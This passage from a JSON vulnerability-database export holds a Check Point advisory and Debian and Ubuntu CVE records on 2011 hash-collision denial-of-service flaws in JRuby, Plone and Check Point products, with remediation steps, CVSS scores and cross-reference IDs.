Applications: SecurePlatform WebUI, SmartPortal, IPSO Voyager on all gateway versions (including R71 and R75) \n\nThe following products are **vulnerable** :\n\n * Security Gateway \n * Versions: R71, R75, R75.10\n * Platforms: SecurePlatform, IPSO \n * Vulnerable applications: Mobile Access Blade, DLP, Identity Awareness and UserCheck portals \n * Endpoint Security Server - all versions \n * Integrity Server - all versions \n * Connectra - all versions \n\n**Solution for Security Gateway and Connectra portals**\n\nTo protect a Security Gateway from this vulnerability follow the instructions\nbelow:\n\n * Download [SG_HotFix_CVE-2011-4838.sh](https://supportcenter.checkpoint.com/supportcenter/portal?action=portlets.DCFileAction&eventSubmit_doGetdcdetails=&fileid=13554 \"HotFix\") and copy it to the Security Gateway. \n * Run: SG_HotFix_CVE-2011-4838.sh \n\n**Solution for Endpoint Security Server**\n\nTo protect an Endpoint Security Server from this vulnerability run the\nfollowing commands on the Endpoint Security Server machine:\n\n 1. Run: **cpstop**\n 2. Run: **cd %UEPMDIR%\\engine\\conf**\n 3. Run: **copy server.xml server.xml.bak**\n 4. Remove the following line from _server.xml_ : **< Context docBase=\"WRH\" path=\"/webrh\" reloadable=\"false\"/>**\n 5. Run: **cpstart**\n\n**Solution for Integrity Server**\n\n[Contact Check Point\nSupport](http://www.checkpoint.com/services/contact/index.html) to get a\nHotfix for this issue. \nA Support Engineer will make sure the Hotfix is compatible with your\nenvironment before providing the Hotfix.\n\nCheck Point recommends to always protect management servers behind a Security\nGateway.\n\n**IPS protection**\n\nTo protect web applications behind the Security Gateway, Check Point suggests\nenabling the \"Microsoft IIS Repeated Parameters Request Denial of Service\"\nprotection. Check Point also released advisory\n[CPAI-2011-593](http://www.checkpoint.com/defense/advisories/public/2011/cpai-29-dec.html)\nwith specific instructions.\n\nThis pre-emptive IPS protection released in September 2010 will block this\nattack.\n\n", "published": "2011-12-29T22:00:00", "modified": "2011-12-29T22:00:00", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 7.8, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {}, "href": "https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit_doGoviewsolutiondetails=&solutionid=sk66350", "reporter": "Check Point Security Alerts", "references": [], "cvelist": ["CVE-2011-3414", "CVE-2011-4815", "CVE-2011-4838", "CVE-2011-4885"], "immutableFields": [], "lastseen": "2021-11-30T15:07:42", "history": [], "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "cert", "idList": ["VU:903934"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2011-4815", "UB:CVE-2011-4838", "UB:CVE-2011-4885"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2011-4838"]}, {"type": "cve", "idList": ["CVE-2011-4885", "CVE-2011-4838", "CVE-2011-3414", "CVE-2011-4815"]}, {"type": "f5", "idList": ["SOL13588", "F5:K13588"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/APPLE-OSX-LOGINWINDOW-CVE-2011-4815/", "MSF:ILITIES/JUNIPER-JUNOS-OS-JSA10522/", "MSF:ILITIES/APPLE-OSX-PHP-CVE-2011-4885/", "MSF:ILITIES/APPLE-OSX-LOGINWINDOW-CVE-2011-4885/", "MSF:ILITIES/CENTOS_LINUX-CVE-2011-4815/", "MSF:ILITIES/CENTOS_LINUX-CVE-2011-4885/"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2014-1022", "CPAI-2012-001", "CPAI-2013-033"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:27500", "SECURITYVULNS:DOC:27501"]}, {"type": "seebug", "idList": ["SSV:30001", "SSV:72454", "SSV:26122", "SSV:26121", "SSV:26126"]}, {"type": "freebsd", "idList": ["91BE81E7-3FEA-11E1-AFC7-2C4138874F7D"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310122002", "OPENVAS:1361412562310831554", "OPENVAS:1361412562310863681", "OPENVAS:881075", "OPENVAS:1361412562310120218", "OPENVAS:1361412562310122001", "OPENVAS:1361412562310863921", "OPENVAS:1361412562310120220", "OPENVAS:1361412562310881119", "OPENVAS:863954", "OPENVAS:831554", "OPENVAS:863921", "OPENVAS:881226", "OPENVAS:881167", "OPENVAS:863681", "OPENVAS:870638", "OPENVAS:1361412562310863712", "OPENVAS:70754", "OPENVAS:870542", "OPENVAS:1361412562310881149", "OPENVAS:1361412562310881167", "OPENVAS:136141256231071568", "OPENVAS:1361412562310870638", "OPENVAS:71568", "OPENVAS:136141256231070754"]}, {"type": "nessus", "idList": ["DEBIAN_DLA-209.NASL", "FREEBSD_PKG_91BE81E73FEA11E1AFC72C4138874F7D.NASL", "ALA_ALAS-2012-35.NASL", "SOLARIS11_RUBY_20120417.NASL", "ORACLELINUX_ELSA-2012-0069.NASL", "SL_20120130_RUBY_ON_SL6_X.NASL", "ASP_NET_HASH_COLLISION_DOS.NBIN", "ORACLELINUX_ELSA-2012-0070.NASL", "CENTOS_RHSA-2012-0069.NASL", "MANDRIVA_MDVSA-2012-024.NASL", "PHP_5_HASH_COLLISION_DOS.NBIN", "FEDORA_2012-0504.NASL", "F5_BIGIP_SOL13588.NASL", "GENTOO_GLSA-201207-06.NASL", "REDHAT-RHSA-2012-0070.NASL", "REDHAT-RHSA-2012-0069.NASL", "CENTOS_RHSA-2012-0070.NASL", "SL_20120130_RUBY_ON_SL4_X.NASL", "FEDORA_2012-1301.NASL", "REDHAT-RHSA-2012-0019.NASL", "FEDORA_2011-17542.NASL", "FEDORA_2011-17551.NASL", "FEDORA_2012-0420.NASL"]}, {"type": "gentoo", "idList": ["GLSA-201207-06"]}, {"type": "centos", "idList": ["CESA-2012:0070", "CESA-2012:0069"]}, {"type": "jvn", "idList": ["JVN:90615481"]}, {"type": "fedora", "idList": ["FEDORA:BFF2C21133", "FEDORA:6D8EE20EB6", "FEDORA:994FA20B8F", "FEDORA:8CC7E20B55", "FEDORA:3515C213E6"]}, {"type": "amazon", "idList": ["ALAS-2012-035"]}, {"type": "oraclelinux", "idList": ["ELSA-2012-0069", "ELSA-2012-0070"]}, {"type": "redhat", "idList": ["RHSA-2012:0069", "RHSA-2012:0070"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:B8DA2EAADC9FCF2EF821731BB51E75E7"]}, {"type": "exploitdb", "idList": ["EDB-ID:18305", "EDB-ID:18296"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:108294", "PACKETSTORM:108287"]}, {"type": "debian", "idList": ["DEBIAN:DLA-209-1:6EC99", "DEBIAN:DLA-209-1:3C908"]}, {"type": "rubygems", "idList": ["RUBY:RUBY-2011-4815-78118", "RUBY:JRUBY-2011-4838-78116"]}], "modified": "2021-11-30T07:12:44", "rev": 2}, "score": {"value": 7.0, "vector": "NONE", "modified": "2021-11-30T07:12:44", "rev": 2}}, "objectVersion": "1.6", "affectedSoftware": [{"version": "R71", "operator": "eq", "name": "quantum security gateways"}, {"version": "R75", "operator": "eq", "name": "quantum security gateways"}, {"version": "R71", "operator": "eq", "name": "endpoint security server"}, {"version": "R75", "operator": "eq", "name": "endpoint security server"}, {"version": "R71", "operator": "eq", "name": "mobile access / ssl vpn"}, {"version": "R75", "operator": "eq", "name": "mobile access / ssl vpn"}]}, "lastseen": "2021-11-30T15:07:42", "differentElements": ["modified", "published"], "edition": 55}], "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "cert", "idList": ["VU:903934"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2011-4838"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2011-4815", "UB:CVE-2011-4885", "UB:CVE-2011-4838"]}, {"type": "cve", "idList": ["CVE-2011-4815", "CVE-2011-4838", "CVE-2011-3414", "CVE-2011-4885"]}, {"type": "f5", "idList": ["SOL13588", "F5:K13588"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/APPLE-OSX-LOGINWINDOW-CVE-2011-4815/", "MSF:ILITIES/APPLE-OSX-PHP-CVE-2011-4885/", "MSF:ILITIES/CENTOS_LINUX-CVE-2011-4885/", "MSF:ILITIES/JUNIPER-JUNOS-OS-JSA10522/", "MSF:ILITIES/CENTOS_LINUX-CVE-2011-4815/", "MSF:ILITIES/APPLE-OSX-LOGINWINDOW-CVE-2011-4885/"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2013-033", "CPAI-2012-001", "CPAI-2014-1022"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:27500", "SECURITYVULNS:DOC:27501"]}, {"type": "seebug", "idList": ["SSV:30001", "SSV:26122", "SSV:72454", "SSV:26126", "SSV:26121"]}, {"type": "openvas", "idList": ["OPENVAS:831554", "OPENVAS:1361412562310831554", "OPENVAS:1361412562310863681", "OPENVAS:1361412562310863706", "OPENVAS:881075", "OPENVAS:1361412562310122002", "OPENVAS:870638", "OPENVAS:136141256231071568", "OPENVAS:1361412562310863921", "OPENVAS:863712", "OPENVAS:1361412562310881167", "OPENVAS:881167", "OPENVAS:70754", "OPENVAS:863681", "OPENVAS:71568", "OPENVAS:136141256231070754", "OPENVAS:1361412562310120218", "OPENVAS:863921", "OPENVAS:1361412562310122001", "OPENVAS:1361412562310864028", "OPENVAS:1361412562310870638"]}, {"type": "nessus", "idList": ["FREEBSD_PKG_91BE81E73FEA11E1AFC72C4138874F7D.NASL", "DEBIAN_DLA-209.NASL", "FEDORA_2012-0420.NASL", "SL_20120111_PHP53_AND_PHP_ON_SL5_X.NASL", "ASP_NET_HASH_COLLISION_DOS.NBIN", "ALA_ALAS-2012-35.NASL", "FEDORA_2011-17551.NASL", "PHP_5_HASH_COLLISION_DOS.NBIN", "CENTOS_RHSA-2012-0070.NASL", "ORACLELINUX_ELSA-2012-0069.NASL", "SL_20120130_RUBY_ON_SL6_X.NASL", "MANDRIVA_MDVSA-2012-024.NASL", "CENTOS_RHSA-2012-0069.NASL", "SOLARIS11_RUBY_20120417.NASL", "F5_BIGIP_SOL13588.NASL", "REDHAT-RHSA-2012-0019.NASL", "FEDORA_2012-0504.NASL", "FEDORA_2011-17542.NASL", "ORACLELINUX_ELSA-2012-0070.NASL", "REDHAT-RHSA-2012-0069.NASL", "GENTOO_GLSA-201207-06.NASL", "REDHAT-RHSA-2012-0070.NASL", "SL_20120130_RUBY_ON_SL4_X.NASL"]}, {"type": "freebsd", "idList": ["91BE81E7-3FEA-11E1-AFC7-2C4138874F7D", "D3921810-3C80-11E1-97E8-00215C6A37BB"]}, {"type": "gentoo", "idList": ["GLSA-201207-06"]}, {"type": "centos", "idList": ["CESA-2012:0069", "CESA-2012:0070", "CESA-2012:0019"]}, {"type": "jvn", "idList": ["JVN:90615481"]}, {"type": "fedora", "idList": ["FEDORA:7706F20CE7", "FEDORA:6D8EE20EB6", "FEDORA:8CC7E20B55", "FEDORA:BFF2C21133"]}, {"type": "amazon", "idList": ["ALAS-2012-035", "ALAS-2012-037"]}, {"type": "oraclelinux", "idList": ["ELSA-2012-0069", "ELSA-2012-0019", "ELSA-2012-0070"]}, {"type": "redhat", "idList": ["RHSA-2012:0019", "RHSA-2012:0070", "RHSA-2012:0069"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:108287", "PACKETSTORM:108294"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:B8DA2EAADC9FCF2EF821731BB51E75E7"]}, {"type": "exploitdb", "idList": ["EDB-ID:18296", "EDB-ID:18305"]}, {"type": "debian", "idList": ["DEBIAN:DLA-209-1:6EC99", "DEBIAN:DLA-209-1:3C908"]}, {"type": "rubygems", "idList": ["RUBY:RUBY-2011-4815-78118", "RUBY:JRUBY-2011-4838-78116"]}], "modified": "2021-11-30T19:07:53", "rev": 2}, "score": {"value": 7.0, "vector": "NONE", "modified": "2021-11-30T19:07:53", "rev": 2}}, "objectVersion": "1.6", "affectedSoftware": [{"version": "R71", "operator": "eq", "name": "quantum security gateways"}, {"version": "R75", "operator": "eq", "name": "quantum security gateways"}, {"version": "R71", "operator": "eq", "name": "endpoint security server"}, {"version": "R75", "operator": "eq", "name": "endpoint security server"}, {"version": "R71", "operator": "eq", "name": "mobile access / ssl vpn"}, {"version": "R75", "operator": "eq", "name": "mobile access / ssl vpn"}], "_object_type": "robots.models.checkpoint.CheckpointSecurityBulletin", "_object_types": ["robots.models.base.Bulletin", "robots.models.checkpoint.CheckpointSecurityBulletin"]}], "debiancve": [{"id": "DEBIANCVE:CVE-2011-4838", "vendorId": null, "hash": "1bc192c7af3bf4c1581f87a50eff8433", "type": "debiancve", "bulletinFamily": "info", "title": "CVE-2011-4838", "description": "JRuby before 1.6.5.1 computes hash values without restricting the ability to trigger hash collisions predictably, which allows context-dependent attackers to cause a denial of service (CPU consumption) via crafted input to an application that maintains a hash table.", "published": "2011-12-15T00:00:00", "modified": "2011-12-15T00:00:00", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5.0, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {}, "href": "https://security-tracker.debian.org/tracker/CVE-2011-4838", "reporter": "Debian Security Bug Tracker", "references": [], "cvelist": ["CVE-2011-4838"], "immutableFields": [], "lastseen": "2021-11-29T13:56:44", "history": [], "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "ubuntucve", "idList": ["UB:CVE-2011-4838"]}, {"type": "cve", "idList": ["CVE-2011-4838"]}, {"type": "checkpoint_security", "idList": ["CPS:SK66350"]}, {"type": "openvas", "idList": ["OPENVAS:136141256231070754", "OPENVAS:136141256231071568", "OPENVAS:71568", "OPENVAS:70754"]}, {"type": "nessus", "idList": ["FREEBSD_PKG_91BE81E73FEA11E1AFC72C4138874F7D.NASL", "GENTOO_GLSA-201207-06.NASL", "DEBIAN_DLA-209.NASL"]}, {"type": "gentoo", "idList": ["GLSA-201207-06"]}, {"type": "debian", "idList": ["DEBIAN:DLA-209-1:6EC99", "DEBIAN:DLA-209-1:3C908"]}, {"type": "rubygems", "idList": ["RUBY:JRUBY-2011-4838-78116"]}, {"type": "freebsd", "idList": ["91BE81E7-3FEA-11E1-AFC7-2C4138874F7D"]}, {"type": "cert", "idList": ["VU:903934"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:27500"]}, {"type": "seebug", "idList": ["SSV:26121"]}], "modified": "2021-11-29T13:56:44", "rev": 2}, "score": {"value": 5.9, "vector": "NONE", "modified": "2021-11-29T13:56:44", "rev": 2}}, "objectVersion": "1.6", "affectedPackage": [{"OS": "Debian", "OSVersion": "10", "arch": "all", "packageFilename": "jruby_9.1.17.0-3_all.deb", "packageVersion": "9.1.17.0-3", "operator": "lt", "status": "resolved", "packageName": "jruby"}, {"OS": "Debian", "OSVersion": "999", "arch": "all", "packageFilename": "jruby_9.1.17.0-3_all.deb", "packageVersion": "9.1.17.0-3", "operator": "lt", "status": "resolved", "packageName": "jruby"}, {"OS": "Debian", "OSVersion": "9", "arch": "all", "packageFilename": "jruby_1.7.26-1+deb9u1_all.deb", "packageVersion": "1.7.26-1+deb9u1", "operator": "lt", "status": "resolved", "packageName": "jruby"}], "_object_type": "robots.models.debiancve.DebianCveBulletin", "_object_types": ["robots.models.debiancve.DebianCveBulletin", "robots.models.base.Bulletin"]}], "ubuntucve": [{"id": "UB:CVE-2011-4838", "vendorId": null, "hash": "8666dfbdbb7ab2fa1857b502cc259af9", "type": "ubuntucve", "bulletinFamily": "info", "title": "CVE-2011-4838", "description": "JRuby before 1.6.5.1 computes hash values without restricting the ability\nto trigger hash collisions predictably, which allows context-dependent\nattackers to cause a denial of service (CPU consumption) via crafted input\nto an application that maintains a hash table.", "published": "2011-12-30T00:00:00", "modified": "2011-12-30T00:00:00", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5.0, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {}, "href": "https://ubuntu.com/security/CVE-2011-4838", "reporter": "ubuntu.com", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4838", "http://www.kb.cert.org/vuls/id/903934", "http://www.ocert.org/advisories/ocert-2011-003.html", "https://nvd.nist.gov/vuln/detail/CVE-2011-4838", "https://launchpad.net/bugs/cve/CVE-2011-4838", "https://security-tracker.debian.org/tracker/CVE-2011-4838"], "cvelist": ["CVE-2011-4838"], "immutableFields": [], "lastseen": "2021-11-22T21:55:58", "history": [{"bulletin": {"id": "UB:CVE-2011-4838", "vendorId": null, "hash": "c3b123d6b33e8e5b161297e288fffffa", "type": "ubuntucve", "bulletinFamily": "info", "title": "CVE-2011-4838", "description": "JRuby before 1.6.5.1 computes hash values without restricting the ability\nto trigger hash collisions predictably, which allows context-dependent\nattackers to cause a denial of service (CPU consumption) via crafted input\nto an application that maintains a hash table.", "published": "2011-12-30T00:00:00", "modified": "2011-12-30T00:00:00", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cvss2": {}, "cvss3": {}, "href": "https://ubuntu.com/security/CVE-2011-4838", "reporter": "ubuntu.com", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4838", "http://www.kb.cert.org/vuls/id/903934", "http://www.ocert.org/advisories/ocert-2011-003.html", "https://nvd.nist.gov/vuln/detail/CVE-2011-4838", "https://launchpad.net/bugs/cve/CVE-2011-4838", "https://security-tracker.debian.org/tracker/CVE-2011-4838"], "cvelist": ["CVE-2011-4838"], "immutableFields": [], "lastseen": "2021-07-01T00:42:51", "history": [], "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2011-4838"]}, {"type": "gentoo", "idList": ["GLSA-201207-06"]}, {"type": "openvas", "idList": ["OPENVAS:136141256231070754", "OPENVAS:71568", "OPENVAS:70754", "OPENVAS:136141256231071568"]}, {"type": "nessus", "idList": ["DEBIAN_DLA-209.NASL", "GENTOO_GLSA-201207-06.NASL", "FREEBSD_PKG_91BE81E73FEA11E1AFC72C4138874F7D.NASL"]}, {"type": "debian", "idList": ["DEBIAN:DLA-209-1:3C908"]}, {"type": "freebsd", "idList": ["91BE81E7-3FEA-11E1-AFC7-2C4138874F7D"]}, {"type": "cert", "idList": ["VU:903934"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:27500"]}, {"type": "seebug", "idList": ["SSV:26121"]}], "modified": "2021-07-01T00:42:51", "rev": 2}, "score": {"value": 5.9, "vector": "NONE", "modified": "2021-07-01T00:42:51", "rev": 2}}, "objectVersion": "1.5", "affectedPackage": [{"OS": "ubuntu", "OSVersion": "Upstream", "arch": "noarch", "packageVersion": "1.5.6-4", "packageFilename": "UNKNOWN", "operator": "lt", "packageName": "jruby"}], "bugs": []}, "lastseen": "2021-07-01T00:42:51", "differentElements": ["cvss2"], "edition": 1}, {"bulletin": {"id": "UB:CVE-2011-4838", "vendorId": null, "hash": "a4476281d5759ec9d4598771dcea67cc", "type": "ubuntucve", "bulletinFamily": "info", "title": "CVE-2011-4838", "description": "JRuby before 1.6.5.1 computes hash values without restricting the ability\nto trigger hash collisions predictably, which allows context-dependent\nattackers to cause a denial of service (CPU consumption) via crafted input\nto an application that maintains a hash table.", "published": "2011-12-30T00:00:00", "modified": "2011-12-30T00:00:00", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5.0, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {}, "href": "https://ubuntu.com/security/CVE-2011-4838", "reporter": "ubuntu.com", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4838", "http://www.kb.cert.org/vuls/id/903934", "http://www.ocert.org/advisories/ocert-2011-003.html", "https://nvd.nist.gov/vuln/detail/CVE-2011-4838", "https://launchpad.net/bugs/cve/CVE-2011-4838", "https://security-tracker.debian.org/tracker/CVE-2011-4838"], "cvelist": ["CVE-2011-4838"], "immutableFields": [], "lastseen": "2021-07-31T01:36:29", "history": [], "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2011-4838"]}, {"type": "openvas", "idList": ["OPENVAS:70754", "OPENVAS:71568", "OPENVAS:136141256231070754", "OPENVAS:136141256231071568"]}, {"type": "nessus", "idList": ["FREEBSD_PKG_91BE81E73FEA11E1AFC72C4138874F7D.NASL", "GENTOO_GLSA-201207-06.NASL", "DEBIAN_DLA-209.NASL"]}, {"type": "gentoo", "idList": ["GLSA-201207-06"]}, {"type": "debian", "idList": ["DEBIAN:DLA-209-1:3C908"]}, {"type": "cert", "idList": ["VU:903934"]}, {"type": "freebsd", "idList": ["91BE81E7-3FEA-11E1-AFC7-2C4138874F7D"]}, {"type": "seebug", "idList": ["SSV:26121"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:27500"]}], "modified": "2021-07-31T01:36:29", "rev": 2}, "score": {"value": 5.9, "vector": "NONE", "modified": "2021-07-31T01:36:29", "rev": 2}}, "objectVersion": "1.6", "affectedPackage": [{"OS": "ubuntu", "OSVersion": "Upstream", "arch": "noarch", "packageVersion": "1.5.6-4", "packageFilename": "UNKNOWN", "operator": "lt", "packageName": "jruby"}], "bugs": []}, "lastseen": "2021-07-31T01:36:29", "differentElements": ["affectedPackage"], "edition": 2}], "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2011-4838"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2011-4838"]}, {"type": "checkpoint_security", "idList": ["CPS:SK66350"]}, {"type": "nessus", "idList": ["FREEBSD_PKG_91BE81E73FEA11E1AFC72C4138874F7D.NASL", "GENTOO_GLSA-201207-06.NASL", "DEBIAN_DLA-209.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:136141256231070754", "OPENVAS:136141256231071568", "OPENVAS:71568", "OPENVAS:70754"]}, {"type": "gentoo", "idList": ["GLSA-201207-06"]}, {"type": "debian", "idList": ["DEBIAN:DLA-209-1:6EC99", "DEBIAN:DLA-209-1:3C908"]}, {"type": "rubygems", "idList": ["RUBY:JRUBY-2011-4838-78116"]}, {"type": "cert", "idList": ["VU:903934"]}, {"type": "freebsd", "idList": ["91BE81E7-3FEA-11E1-AFC7-2C4138874F7D"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:27500"]}, {"type": "seebug", "idList": ["SSV:26121"]}], "modified": "2021-11-22T21:55:58", "rev": 2}, "score": {"value": 5.9, "vector": "NONE", "modified": "2021-11-22T21:55:58", "rev": 2}}, "objectVersion": "1.6", "affectedPackage": [{"OS": "ubuntu", "OSVersion": "Upstream", "arch": "noarch", "packageVersion": "1.5.6-4", "packageFilename": "UNKNOWN", "operator": "lt", "status": "released", "packageName": "jruby"}], "bugs": [], "_object_type": "robots.models.ubuntucve.UbuntuCVEBulletin", "_object_types": ["robots.models.ubuntucve.UbuntuCVEBulletin", "robots.models.base.Bulletin"]}, {"id": "UB:CVE-2011-4462", "vendorId": null, "hash": "f72f79f4e7a8717b50a066df6ddb9ed8", "type": "ubuntucve", "bulletinFamily": "info", "title": "CVE-2011-4462", "description": "Plone 4.1.3 and earlier computes hash values for form parameters without\nrestricting the ability to trigger hash collisions predictably, which\nallows remote attackers to cause a denial of service (CPU consumption) by\nsending many crafted parameters.", "published": "2011-12-30T00:00:00", "modified": "2011-12-30T00:00:00", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5.0, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {}, "href": "https://ubuntu.com/security/CVE-2011-4462", "reporter": "ubuntu.com", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4462", "https://nvd.nist.gov/vuln/detail/CVE-2011-4462", "https://launchpad.net/bugs/cve/CVE-2011-4462", "https://security-tracker.debian.org/tracker/CVE-2011-4462"], "cvelist": ["CVE-2011-4462"], "immutableFields": [], "lastseen": "2021-11-22T21:56:00", "history": [{"bulletin": {"id": "UB:CVE-2011-4462", "vendorId": null, "hash": "95e3d0c612e2a88747137ebed9197a5e", "type": "ubuntucve", "bulletinFamily": "info", "title": "CVE-2011-4462", "description": "Plone 4.1.3 and earlier computes hash values for form parameters without\nrestricting the ability to trigger hash collisions predictably, which\nallows remote attackers to cause a denial of service (CPU consumption) by\nsending many crafted parameters.", "published": "2011-12-30T00:00:00", "modified": "2011-12-30T00:00:00", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cvss2": {}, "cvss3": {}, "href": "https://ubuntu.com/security/CVE-2011-4462", "reporter": "ubuntu.com", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4462", "https://nvd.nist.gov/vuln/detail/CVE-2011-4462", "https://launchpad.net/bugs/cve/CVE-2011-4462", "https://security-tracker.debian.org/tracker/CVE-2011-4462"], "cvelist": ["CVE-2011-4462"], "immutableFields": [], "lastseen": "2021-07-01T00:42:51", "history": [], "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2011-4462"]}, {"type": "github", "idList": ["GHSA-PCWM-8JC3-QXVJ"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:27500"]}, {"type": "seebug", "idList": ["SSV:26121"]}], "modified": "2021-07-01T00:42:51", "rev": 2}, "score": {"value": 5.2, "vector": "NONE", "modified": "2021-07-01T00:42:51", "rev": 2}}, "objectVersion": "1.5", "affectedPackage": [{"OS": "ubuntu", "OSVersion": "Upstream", "arch": "noarch", "packageVersion": "any", "packageFilename": "UNKNOWN", "operator": "lt", "packageName": "zope-cmfplone"}], "bugs": []}, "lastseen": "2021-07-01T00:42:51", "differentElements": ["cvss2"], "edition": 1}, {"bulletin": {"id": "UB:CVE-2011-4462", "vendorId": null, "hash": "0916b88bb4b669bfc676c5c540163b93", "type": "ubuntucve", "bulletinFamily": "info", "title": "CVE-2011-4462", "description": "Plone 4.1.3 and earlier computes hash values for form parameters without\nrestricting the ability to trigger hash collisions predictably, which\nallows remote attackers to cause a denial of service (CPU consumption) by\nsending many crafted parameters.", "published": "2011-12-30T00:00:00", "modified": "2011-12-30T00:00:00", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5.0, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {}, "href": "https://ubuntu.com/security/CVE-2011-4462", "reporter": "ubuntu.com", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4462", "https://nvd.nist.gov/vuln/detail/CVE-2011-4462", "https://launchpad.net/bugs/cve/CVE-2011-4462", "https://security-tracker.debian.org/tracker/CVE-2011-4462"], "cvelist": ["CVE-2011-4462"], "immutableFields": [], "lastseen": "2021-07-31T01:36:29", "history": [], "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2011-4462"]}, {"type": "github", "idList": ["GHSA-PCWM-8JC3-QXVJ"]}, {"type": "seebug", "idList": ["SSV:26121"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:27500"]}], "modified": "2021-07-31T01:36:29", "rev": 2}, "score": {"value": 5.2, "vector": "NONE", "modified": "2021-07-31T01:36:29", "rev": 2}}, 